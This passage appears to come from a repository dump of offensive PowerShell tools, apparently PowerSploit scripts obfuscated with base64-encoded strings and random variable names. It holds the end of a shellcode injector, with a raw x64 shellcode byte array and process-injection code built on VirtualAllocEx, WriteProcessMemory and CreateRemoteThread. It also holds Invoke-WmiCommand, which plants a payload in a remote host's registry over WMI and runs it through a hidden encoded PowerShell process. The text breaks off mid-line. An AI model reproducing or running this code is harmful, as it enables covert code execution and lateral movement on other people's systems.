0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52, 338 | 0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0, 339 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed, 340 | 0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88, 341 | 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44, 342 | 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48, 343 | 0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1, 344 | 0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44, 345 | 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49, 346 | 0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a, 347 | 0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 348 | 
0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00, 349 | 0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b, 350 | 0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 351 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47, 352 | 0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00) 353 | } 354 | if ( $PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAG8AYwBlAHMAcwBJAEQA')))] ) 355 | { 356 | ${91ebd867fd9541d387fab6fae69d1457} = Get-ProcAddress kernel32.dll OpenProcess 357 | ${4dc2fb1f85e245eaac068c68c51d77bd} = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) 358 | ${3ebe29a2fe6b4585ae05f269775ede9e} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${91ebd867fd9541d387fab6fae69d1457}, ${4dc2fb1f85e245eaac068c68c51d77bd}) 359 | ${c4eebcbe613d4b89b02665f9d5a8e2e7} = Get-ProcAddress kernel32.dll VirtualAllocEx 360 | ${52e3718fd2c04b34b2c24b0caef110ef} = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr]) 361 | ${8db0f45eca4f44feaf866f2cd42efd1b} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${c4eebcbe613d4b89b02665f9d5a8e2e7}, ${52e3718fd2c04b34b2c24b0caef110ef}) 362 | ${ad4947a83c084cd980c637bffd04e08d} = Get-ProcAddress kernel32.dll WriteProcessMemory 363 | ${928724ecfd9a435394fa6f2562a108a3} = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]) 364 | ${99cd331d99df48e8ae580253e8b17169} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${ad4947a83c084cd980c637bffd04e08d}, ${928724ecfd9a435394fa6f2562a108a3}) 365 | ${c0f03151a5b9489b9d0b106ee62ff1ee} = Get-ProcAddress kernel32.dll CreateRemoteThread 366 | ${7ba2f1c0231c4175ab350ae21b51a1a1} = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) 
([IntPtr]) 367 | ${9edf6540c07a449d85e95fc37d04768c} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${c0f03151a5b9489b9d0b106ee62ff1ee}, ${7ba2f1c0231c4175ab350ae21b51a1a1}) 368 | ${04197b3fa4c841028b83c0b2a2a31177} = Get-ProcAddress kernel32.dll CloseHandle 369 | ${b77576c257d745d998c14c925f7a5522} = Get-DelegateType @([IntPtr]) ([Bool]) 370 | ${4d80fc465d0f4c81a9f0510ed4e4a630} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${04197b3fa4c841028b83c0b2a2a31177}, ${b77576c257d745d998c14c925f7a5522}) 371 | Write-Verbose "Injecting shellcode into PID: ${a1c827e2c0ed4a4889805491350137e2}" 372 | if ( ${bab5df81ac5040dbbbb4c01205f3b8e4} -or $psCmdlet.ShouldContinue( $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvACAAeQBvAHUAIAB3AGkAcwBoACAAdABvACAAYwBhAHIAcgB5ACAAbwB1AHQAIAB5AG8AdQByACAAZQB2AGkAbAAgAHAAbABhAG4AcwA/AA=='))), 373 | "Injecting shellcode injecting into $((ps -Id ${a1c827e2c0ed4a4889805491350137e2}).ProcessName) (${a1c827e2c0ed4a4889805491350137e2})!" 
) ) 374 | { 375 | Inject-RemoteShellcode ${a1c827e2c0ed4a4889805491350137e2} 376 | } 377 | } 378 | else 379 | { 380 | ${eb694d8cd52a4868803f3b0f11bd411f} = Get-ProcAddress kernel32.dll VirtualAlloc 381 | ${f45d43d878b244adacf5eac2265ea365} = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]) 382 | ${eb933ced95a944428b16abca963b8087} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${eb694d8cd52a4868803f3b0f11bd411f}, ${f45d43d878b244adacf5eac2265ea365}) 383 | ${d6a315bed6d84ae7b7127a9e88ec114f} = Get-ProcAddress kernel32.dll VirtualFree 384 | ${e5e8edb5b698425e95d7de05811cb49c} = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool]) 385 | ${711707a94e3e4d0cb26eba626fed37bc} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${d6a315bed6d84ae7b7127a9e88ec114f}, ${e5e8edb5b698425e95d7de05811cb49c}) 386 | ${4c452a9edce440a28d28cde08bb61173} = Get-ProcAddress kernel32.dll CreateThread 387 | ${58b0c7ec8c4c4c4fb9de23fbba5b819e} = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) 388 | ${56bc5f168ce04046907a2bb4ffc2497f} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${4c452a9edce440a28d28cde08bb61173}, ${58b0c7ec8c4c4c4fb9de23fbba5b819e}) 389 | ${8c1dba931bbd41e6b828883396d210f4} = Get-ProcAddress kernel32.dll WaitForSingleObject 390 | ${02cc210f6b534ce4acb4e04fba7d503a} = Get-DelegateType @([IntPtr], [Int32]) ([Int]) 391 | ${590b2e0764d34d65ba757e59bd6b00b4} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${8c1dba931bbd41e6b828883396d210f4}, ${02cc210f6b534ce4acb4e04fba7d503a}) 392 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAGoAZQBjAHQAaQBuAGcAIABzAGgAZQBsAGwAYwBvAGQAZQAgAGkAbgB0AG8AIABQAG8AdwBlAHIAUwBoAGUAbABsAA=='))) 393 | if ( ${bab5df81ac5040dbbbb4c01205f3b8e4} -or $psCmdlet.ShouldContinue( 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvACAAeQBvAHUAIAB3AGkAcwBoACAAdABvACAAYwBhAHIAcgB5ACAAbwB1AHQAIAB5AG8AdQByACAAZQB2AGkAbAAgAHAAbABhAG4AcwA/AA=='))), 394 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAGoAZQBjAHQAaQBuAGcAIABzAGgAZQBsAGwAYwBvAGQAZQAgAGkAbgB0AG8AIAB0AGgAZQAgAHIAdQBuAG4AaQBuAGcAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAcAByAG8AYwBlAHMAcwAhAA=='))) ) ) 395 | { 396 | Inject-LocalShellcode 397 | } 398 | } 399 | } 400 | -------------------------------------------------------------------------------- /Invoke-WmiCommand.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-WmiCommand { 2 | <# 3 | .SYNOPSIS 4 | 5 | Executes a PowerShell ScriptBlock on a target computer using WMI as a 6 | pure C2 channel. 7 | 8 | Author: Matthew Graeber 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | 13 | .DESCRIPTION 14 | 15 | Invoke-WmiCommand executes a PowerShell ScriptBlock on a target 16 | computer using WMI as a pure C2 channel. It does this by using the 17 | StdRegProv WMI registry provider methods to store a payload into a 18 | registry value. The command is then executed on the victim system and 19 | the output is stored in another registry value that is then retrieved 20 | remotely. 21 | 22 | .PARAMETER Payload 23 | 24 | Specifies the payload to be executed on the remote system. 25 | 26 | .PARAMETER RegistryKeyPath 27 | 28 | Specifies the registry key where the payload and payload output will 29 | be stored. 30 | 31 | .PARAMETER RegistryPayloadValueName 32 | 33 | Specifies the registry value name where the payload will be stored. 34 | 35 | .PARAMETER RegistryResultValueName 36 | 37 | Specifies the registry value name where the payload output will be 38 | stored. 39 | 40 | .PARAMETER ComputerName 41 | 42 | Runs the command on the specified computers. The default is the local 43 | computer. 
44 | 45 | Type the NetBIOS name, an IP address, or a fully qualified domain 46 | name of one or more computers. To specify the local computer, type 47 | the computer name, a dot (.), or "localhost". 48 | 49 | This parameter does not rely on Windows PowerShell remoting. You can 50 | use the ComputerName parameter even if your computer is not 51 | configured to run remote commands. 52 | 53 | .PARAMETER Credential 54 | 55 | Specifies a user account that has permission to perform this action. 56 | The default is the current user. Type a user name, such as "User01", 57 | "Domain01\User01", or User@Contoso.com. Or, enter a PSCredential 58 | object, such as an object that is returned by the Get-Credential 59 | cmdlet. When you type a user name, you will be prompted for a 60 | password. 61 | 62 | .PARAMETER Impersonation 63 | 64 | Specifies the impersonation level to use. Valid values are: 65 | 66 | 0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".) 67 | 68 | 1: Anonymous (Hides the credentials of the caller.) 69 | 70 | 2: Identify (Allows objects to query the credentials of the caller.) 71 | 72 | 3: Impersonate (Allows objects to use the credentials of the caller.) 73 | 74 | 4: Delegate (Allows objects to permit other objects to use the credentials of the caller.) 75 | 76 | .PARAMETER Authentication 77 | 78 | Specifies the authentication level to be used with the WMI connection. Valid values are: 79 | 80 | -1: Unchanged 81 | 82 | 0: Default 83 | 84 | 1: None (No authentication is performed.) 85 | 86 | 2: Connect (Authentication is performed only when the client establishes a relationship with the application.) 87 | 88 | 3: Call (Authentication is performed only at the beginning of each call when the application receives the request.) 89 | 90 | 4: Packet (Authentication is performed on all the data that is received from the client.) 
91 | 92 | 5: PacketIntegrity (All the data that is transferred between the client and the application is authenticated and verified.) 93 | 94 | 6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.) 95 | 96 | .PARAMETER EnableAllPrivileges 97 | 98 | Enables all the privileges of the current user before the command 99 | makes the WMI call. 100 | 101 | .PARAMETER Authority 102 | 103 | Specifies the authority to use to authenticate the WMI connection. 104 | You can specify standard NTLM or Kerberos authentication. To use 105 | NTLM, set the authority setting to ntlmdomain:<DomainName>, where 106 | <DomainName> identifies a valid NTLM domain name. To use Kerberos, 107 | specify kerberos:<DomainName>\<ServerName>. You cannot include the 108 | authority setting when you connect to the local computer. 109 | 110 | .EXAMPLE 111 | 112 | PS C:\>Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1' 113 | 114 | .EXAMPLE 115 | 116 | PS C:\>$Hosts = Get-Content hostnames.txt 117 | PS C:\>$Payload = Get-Content payload.ps1 118 | PS C:\>$Credential = Get-Credential 'TargetDomain\TargetUser' 119 | PS C:\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential 120 | 121 | .EXAMPLE 122 | 123 | PS C:\>$Payload = Get-Content payload.ps1 124 | PS C:\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2' 125 | 126 | .EXAMPLE 127 | 128 | PS C:/>Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose 129 | 130 | .INPUTS 131 | 132 | System.String[] 133 | 134 | Accepts one or more host names/IP addresses over the pipeline. 
135 | 136 | .OUTPUTS 137 | 138 | System.Management.Automation.PSObject 139 | 140 | Outputs a custom object consisting of the target computer name and 141 | the output of the command executed. 142 | 143 | .NOTES 144 | 145 | In order to receive the output from your payload, it must return 146 | actual objects. For example, Write-Host doesn't return objects 147 | rather, it writes directly to the console. If you're using 148 | Write-Host in your scripts though, you probably don't deserve to get 149 | the output of your payload back. :P 150 | #> 151 | [CmdletBinding()] 152 | Param ( 153 | [Parameter( Mandatory = $True )] 154 | [ScriptBlock] 155 | ${b829d8b4107f434489f2a24e98166fab}, 156 | [String] 157 | [ValidateSet( 'HKEY_LOCAL_MACHINE', 158 | 'HKEY_CURRENT_USER', 159 | 'HKEY_CLASSES_ROOT', 160 | 'HKEY_USERS', 161 | 'HKEY_CURRENT_CONFIG' )] 162 | ${ee57e92372e34252addbc38755677dc9} = 'HKEY_CURRENT_USER', 163 | [String] 164 | [ValidateNotNullOrEmpty()] 165 | ${b8a5821b9cde4d56954db60d168ccd81} = 'SOFTWARE\Microsoft\Cryptography\RNG', 166 | [String] 167 | [ValidateNotNullOrEmpty()] 168 | ${c9f7dd28a10745b8a1a5785bc1317b82} = 'Seed', 169 | [String] 170 | [ValidateNotNullOrEmpty()] 171 | ${a03b076451d54aaea1ec6e9ced35d761} = 'Value', 172 | [Parameter( ValueFromPipeline = $True )] 173 | [Alias('Cn')] 174 | [String[]] 175 | [ValidateNotNullOrEmpty()] 176 | ${ba926e6e7cc04ac5bf9e8c1ee609261e} = 'localhost', 177 | [Management.Automation.PSCredential] 178 | [Management.Automation.CredentialAttribute()] 179 | ${c067abdf1bfb4621b133d399cd264630} = [Management.Automation.PSCredential]::Empty, 180 | [Management.ImpersonationLevel] 181 | ${b2989c629f4c41fbb00f7035b2d94a16}, 182 | [System.Management.AuthenticationLevel] 183 | ${a6bacf4b8368429992f3730d67f0ed9d}, 184 | [Switch] 185 | ${c40c652725c64295b000687f5ca244ce}, 186 | [String] 187 | ${aa41c72ec3fb44dab2fad3e4f3c1306d} 188 | ) 189 | BEGIN { 190 | switch (${ee57e92372e34252addbc38755677dc9}) { 191 | 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUA'))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483650 } 192 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAA=='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483649 } 193 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEMATABBAFMAUwBFAFMAXwBSAE8ATwBUAA=='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483648 } 194 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAFUAUwBFAFIAUwA='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483651 } 195 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBDAE8ATgBGAEkARwA='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483653 } 196 | } 197 | ${2a8ed39a52f4476595a097347215a204} = 2147483650 198 | ${457de8c0b140457c862387582cb1823c} = @{} 199 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAZABlAG4AdABpAGEAbAA=')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAZABlAG4AdABpAGEAbAA=')))] = ${c067abdf1bfb4621b133d399cd264630} } 200 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgA=')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgA=')))] = ${b2989c629f4c41fbb00f7035b2d94a16} } 201 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAA==')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAA==')))] = ${a6bacf4b8368429992f3730d67f0ed9d} } 202 | if 
($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBuAGEAYgBsAGUAQQBsAGwAUAByAGkAdgBpAGwAZQBnAGUAcwA=')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBuAGEAYgBsAGUAQQBsAGwAUAByAGkAdgBpAGwAZQBnAGUAcwA=')))] = ${c40c652725c64295b000687f5ca244ce} } 203 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABvAHIAaQB0AHkA')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABvAHIAaQB0AHkA')))] = ${aa41c72ec3fb44dab2fad3e4f3c1306d} } 204 | ${60b69a64f1bf4c349d8ea98f30ee648c} = @{ 205 | KEY_QUERY_VALUE = 1 206 | KEY_SET_VALUE = 2 207 | KEY_CREATE_SUB_KEY = 4 208 | KEY_CREATE = 32 209 | DELETE = 65536 210 | } 211 | ${779eed4e673b417abfb01cb41cf5cd08} = ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBRAFUARQBSAFkAXwBWAEEATABVAEUA')))] -bor 212 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBTAEUAVABfAFYAQQBMAFUARQA=')))] -bor 213 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBDAFIARQBBAFQARQBfAFMAVQBCAF8ASwBFAFkA')))] -bor 214 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBDAFIARQBBAFQARQA=')))] -bor 215 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABFAEwARQBUAEUA')))] 216 | } 217 | PROCESS { 218 | foreach ($Computer in ${ba926e6e7cc04ac5bf9e8c1ee609261e}) { 219 | ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG0AcAB1AHQAZQByAE4AYQBtAGUA')))] = $Computer 220 | Write-Verbose "[$Computer] Creating the following registry key: 
${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 221 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAYQB0AGUASwBlAHkA'))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81} 222 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 223 | throw "[$Computer] Unable to create the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 224 | } 225 | Write-Verbose "[$Computer] Validating read/write/delete privileges for the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 226 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGUAYwBrAEEAYwBjAGUAcwBzAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${779eed4e673b417abfb01cb41cf5cd08} 227 | if (-not ${279cb454c2e443a9a14d056e1ff41a4d}.bGranted) { 228 | throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand." 
229 | } 230 | ${8906be79882545ac9180ca3445bade56} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFMAaABlAGwAbABJAGQAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4AUABvAHcAZQByAFMAaABlAGwAbAA='))) 231 | ${0168d713deb74d75b3f1f71b4f872e7e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABhAHQAaAA='))) 232 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${2a8ed39a52f4476595a097347215a204}, ${8906be79882545ac9180ca3445bade56}, ${0168d713deb74d75b3f1f71b4f872e7e} 233 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 234 | throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\${8906be79882545ac9180ca3445bade56}\${0168d713deb74d75b3f1f71b4f872e7e}" 235 | } 236 | ${6708990988854da996f0047df54da77e} = ${279cb454c2e443a9a14d056e1ff41a4d}.sValue 237 | Write-Verbose "[$Computer] Full PowerShell path: ${6708990988854da996f0047df54da77e}" 238 | ${27f99395791c4ee2b7b06ba2cfa73dea} = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(${b829d8b4107f434489f2a24e98166fab})) 239 | Write-Verbose "[$Computer] Storing the payload into the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 240 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${27f99395791c4ee2b7b06ba2cfa73dea}, ${c9f7dd28a10745b8a1a5785bc1317b82} 241 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 242 | throw "[$Computer] Unable to store the payload in the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 243 | } 244 | ${7d69ebf6d4df4bba851f27cd3ce3c25a} = @" 245 | `$Hive = '${7f8c6bf1e0474106952c6799cf745270}' 246 | `$RegistryKeyPath = '${b8a5821b9cde4d56954db60d168ccd81}' 247 | `$RegistryPayloadValueName = '${c9f7dd28a10745b8a1a5785bc1317b82}' 248 | `$RegistryResultValueName = '${a03b076451d54aaea1ec6e9ced35d761}' 249 | `n 250 | "@ 251 | ${8ddd5d4bd3514330b637ceece32df4bf} = ${7d69ebf6d4df4bba851f27cd3ce3c25a} + { 252 | ${457de8c0b140457c862387582cb1823c} = @{ 253 | Namespace = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) 254 | Class = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) 255 | } 256 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${c9f7dd28a10745b8a1a5785bc1317b82} 257 | if ((${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -eq 0) -and (${279cb454c2e443a9a14d056e1ff41a4d}.sValue)) { 258 | ${b829d8b4107f434489f2a24e98166fab} = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(${279cb454c2e443a9a14d056e1ff41a4d}.sValue)) 259 | ${6b4ded6aa38b4a4ab19f37298f8181f6} = 
[IO.Path]::GetTempFileName() 260 | ${8b6291881c2640e9992b5bf7e1fd3a5c} = iex (${b829d8b4107f434489f2a24e98166fab}) 261 | Export-Clixml -InputObject ${8b6291881c2640e9992b5bf7e1fd3a5c} -Path ${6b4ded6aa38b4a4ab19f37298f8181f6} 262 | ${96fe6c08ff7247f79437340dd1052864} = [IO.File]::ReadAllText(${6b4ded6aa38b4a4ab19f37298f8181f6}) 263 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${96fe6c08ff7247f79437340dd1052864}, ${a03b076451d54aaea1ec6e9ced35d761} 264 | rd -Path ${d179441aac564156b181a4f2548622c0} -Force 265 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQB0AGUAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${c9f7dd28a10745b8a1a5785bc1317b82} 266 | } 267 | } 268 | ${16d25a427e11479caec293ff490244a4} = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(${8ddd5d4bd3514330b637ceece32df4bf})) 269 | ${a52ada24d02b4e228879fc0725ebc3a4} = "${6708990988854da996f0047df54da77e} -WindowStyle Hidden -NoProfile -EncodedCommand ${16d25a427e11479caec293ff490244a4}" 270 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGMAaQBtAHYAMgA='))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAYQB0AGUA'))) -ArgumentList ${a52ada24d02b4e228879fc0725ebc3a4} 271 | sleep -Seconds 5 272 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 273 | throw "[$Computer] Unable to execute payload stored within the following registry value: 
